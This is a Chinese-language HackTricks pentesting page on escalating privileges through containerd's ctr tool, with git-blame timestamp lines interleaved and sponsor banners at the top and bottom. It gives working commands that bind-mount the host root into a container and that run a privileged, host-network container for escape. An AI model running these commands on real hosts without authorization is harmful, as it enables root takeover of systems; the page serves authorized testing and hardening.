2023-08-03 19:12:22 +00:00
# Containerd (ctr)提权
2022-04-28 16:01:33 +00:00
< details >
2024-02-06 14:25:48 +00:00
< summary > < strong > 从零开始学习AWS黑客技术, < / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE( ) < / strong > < / a > < strong > ! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-06 14:25:48 +00:00
支持HackTricks的其他方式:
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群** ](https://discord.gg/hRep4RUj7f ) 或 [**电报群** ](https://t.me/peass ) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live** ](https://twitter.com/hacktricks_live )**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
< / details >
2023-08-03 19:12:22 +00:00
## 基本信息
2021-01-03 00:43:09 +00:00
2024-02-06 14:25:48 +00:00
转到以下链接了解**containerd**和`ctr`是什么:
2021-01-03 00:43:09 +00:00
2022-05-01 13:25:53 +00:00
{% content-ref url="../../network-services-pentesting/2375-pentesting-docker.md" %}
[2375-pentesting-docker.md ](../../network-services-pentesting/2375-pentesting-docker.md )
2021-10-18 11:21:18 +00:00
{% endcontent-ref %}
2021-01-03 00:43:09 +00:00
2022-05-01 13:25:53 +00:00
## PE 1
2021-01-03 00:43:09 +00:00
2024-02-06 14:25:48 +00:00
如果您发现主机包含`ctr`命令:
2021-01-03 00:43:09 +00:00
```bash
which ctr
/usr/bin/ctr
```
2024-02-06 14:25:48 +00:00
您可以列出图像:
2021-01-03 00:43:09 +00:00
```bash
ctr image list
2023-08-03 19:12:22 +00:00
REF TYPE DIGEST SIZE PLATFORMS LABELS
registry:5000/alpine:latest application/vnd.docker.distribution.manifest.v2+json sha256:0565dfc4f13e1df6a2ba35e8ad549b7cb8ce6bccbc472ba69e3fe9326f186fe2 100.1 MiB linux/amd64 -
registry:5000/ubuntu:latest application/vnd.docker.distribution.manifest.v2+json sha256:ea80198bccd78360e4a36eb43f386134b837455dc5ad03236d97133f3ed3571a 302.8 MiB linux/amd64 -
2021-01-03 00:43:09 +00:00
```
2023-08-03 19:12:22 +00:00
然后**运行其中一个镜像,将主机根文件夹挂载到其中**:
2021-01-03 00:43:09 +00:00
```bash
ctr run --mount type=bind,src=/,dst=/,options=rbind -t registry:5000/ubuntu:latest ubuntu bash
```
2022-05-01 13:25:53 +00:00
## PE 2
2021-01-03 00:43:09 +00:00
2024-02-06 14:25:48 +00:00
以特权模式运行容器并从中逃逸。\
您可以这样运行特权容器:
2021-01-03 00:43:09 +00:00
```bash
2023-08-03 19:12:22 +00:00
ctr run --privileged --net-host -t registry:5000/modified-ubuntu:latest ubuntu bash
2021-01-03 00:43:09 +00:00
```
2024-02-06 14:25:48 +00:00
然后,您可以使用以下页面中提到的一些技术来滥用特权功能**逃离其中**:
2021-01-03 00:43:09 +00:00
2023-04-05 15:16:57 +00:00
{% content-ref url="docker-security/" %}
[docker-security ](docker-security/ )
2021-10-18 11:21:18 +00:00
{% endcontent-ref %}
2022-04-28 16:01:33 +00:00
< details >
2024-02-06 14:25:48 +00:00
< summary > < strong > 从零开始学习AWS黑客技术, < / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > ! < / strong > < / summary >
支持HackTricks的其他方式:
2022-04-28 16:01:33 +00:00
2024-02-06 14:25:48 +00:00
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群** ](https://discord.gg/hRep4RUj7f ) 或 [**电报群** ](https://t.me/peass ) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live** ](https://twitter.com/hacktricks_live )**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
< / details >
